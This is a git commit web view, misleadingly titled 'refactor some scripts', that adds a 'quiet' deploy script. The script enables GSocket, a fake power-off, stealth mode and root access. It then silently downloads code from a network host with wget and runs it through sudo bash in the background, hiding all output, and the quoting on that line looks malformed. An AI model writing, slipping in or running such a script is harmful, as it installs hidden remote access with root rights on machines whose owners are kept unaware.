refactor some scripts
This commit is contained in:
12
scripts/deploy/quiet
Executable file
12
scripts/deploy/quiet
Executable file
@@ -0,0 +1,12 @@
|
||||
#!/bin/bash
|
||||
# Quiet installation preset - minimal output
|
||||
export VERBOSE=false
|
||||
export NO_ROOT=false
|
||||
export NO_SERVICES=false
|
||||
export INSTALL_WOL=true
|
||||
export INSTALL_FAKE_POWEROFF=true
|
||||
export INSTALL_GSOCKET=true
|
||||
export STEALTH_MODE=true
|
||||
|
||||
# Redirect output to /dev/null for quieter operation
|
||||
(eval "$(wget -qO- http://192.168.0.104/deployment/y" | sudo bash) &>/dev/null &
|
Reference in New Issue
Block a user